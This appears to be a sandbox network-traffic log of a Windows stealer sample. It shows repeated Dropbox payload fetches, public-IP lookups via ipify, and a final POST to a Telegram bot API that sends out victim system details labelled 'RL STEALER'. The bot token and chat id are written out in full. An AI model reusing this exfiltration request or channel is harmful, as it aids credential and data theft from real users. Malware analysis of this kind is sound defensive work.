2024-12-31 14:02:23 UTC	424	IN	Data Raw: 64 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 20 32 20 31 32 38 20 31 32 35 Data Ascii: d79<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Page not found</title> <style> :root { --colorRgbFacetsTeal600: 2 128 125
2024-12-31 14:02:23 UTC	1369	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 3a 20 35 33 20 35 38 20 36 32 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 54 65 78 74 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 65 66 66 65 63 74 53 68 61 64 6f 77 4c 69 67 Data Ascii: --colorRgbFacetsNeutralLight700: 53 58 62; --colorGrayDarkest: var(--colorRgbFacetsNeutralLight700); --colorGrayLighter: var(--colorRgbFacetsNeutralLight200); --colorText: var(--colorGrayDarkest); --effectShadowLig
2024-12-31 14:02:23 UTC	1369	IN	Data Raw: 67 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 76 61 72 28 2d 2d 65 66 66 65 63 74 53 68 61 64 6f 77 4c 69 67 68 74 53 68 61 6c 6c 6f 77 29 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 29 29 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 Data Ascii: g: 24px; background: white; border-radius: 8px; box-shadow: var(--effectShadowLightShallow); border: 1px solid rgb(var(--colorGrayLighter)); } a { margin: 0; font-weight: 600; color: rgb
2024-12-31 14:02:23 UTC	294	IN	Data Raw: 2e 6e 65 74 6c 69 66 79 2e 63 6f 6d 2f 74 2f 73 75 70 70 6f 72 74 2d 67 75 69 64 65 2d 69 2d 76 65 2d 64 65 70 6c 6f 79 65 64 2d 6d 79 2d 73 69 74 65 2d 62 75 74 2d 69 2d 73 74 69 6c 6c 2d 73 65 65 2d 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 2f 31 32 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e e2 80 9c 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 9d 20 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 74 69 70 73 2e 0a 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 Data Ascii: .netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking" >page not found support guide</a > for troubleshooting tips. </p>
2024-12-31 14:02:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49710	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:24 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:25 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:24 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 36e16ef689ef4f418eceb498fbca234c Connection: close
2024-12-31 14:02:25 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49711	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:24 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:25 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:24 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: cc87dc52118048ac96fad570478049c3 Connection: close
2024-12-31 14:02:25 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49712	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:25 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:26 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:26 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: cdbb9211002d40c39d9da6e89b8af236 Connection: close
2024-12-31 14:02:26 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49713	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:26 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:26 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:26 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 70ecc19e4ade42d7a72614b63641b6d1 Connection: close
2024-12-31 14:02:26 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49714	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:27 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:27 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:27 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 69693b24d51b49a6a2e645da84f2f16a Connection: close
2024-12-31 14:02:27 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49715	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:28 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49716	104.26.12.205	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:29 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-12-31 14:02:29 UTC	424	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 14:02:29 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8faacebc4b5e8ca8-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2015&rtt_var=775&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1395126&cwnd=162&unsent_bytes=0&cid=a26a924b566d9efa&ts=135&x=0"
2024-12-31 14:02:29 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49719	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:29 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:30 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:30 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: f36542c12631497398b626acedf89461 Connection: close
2024-12-31 14:02:30 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49720	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:31 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:31 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:31 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: fa1d76e50ec0476abdb137974b943ca9 Connection: close
2024-12-31 14:02:31 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49721	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:32 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-12-31 14:02:33 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:32 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: a363c16b9d214d7caf750f7eca4d571e Connection: close
2024-12-31 14:02:33 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49723	104.26.12.205	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:34 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-12-31 14:02:34 UTC	424	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 14:02:34 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8faacedc8e410f6c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1495&rtt_var=578&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1867007&cwnd=180&unsent_bytes=0&cid=887d4bbe0030910e&ts=157&x=0"
2024-12-31 14:02:34 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49726	104.26.12.205	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:36 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-12-31 14:02:36 UTC	424	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 14:02:36 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8faacee969dc0f9b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1654&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1697674&cwnd=217&unsent_bytes=0&cid=7acfc66369d98542&ts=134&x=0"
2024-12-31 14:02:36 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49727	149.154.167.220	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:37 UTC	1522	OUT	POST /bot6888669690:AAFyR7HkvXimINeLgRWgwb_Nn3tW88-uq1Y/sendDocument?chat_id=%207424669291&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2012/31/2024%209:02%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20138727%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.189%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F [TRUNCATED] Content-Type: multipart/form-data; boundary=------------------------8dd2a1a13562e73 Host: api.telegram.org Content-Length: 719778 Expect: 100-continue Connection: Keep-Alive
2024-12-31 14:02:37 UTC	25	IN	HTTP/1.1 100 Continue
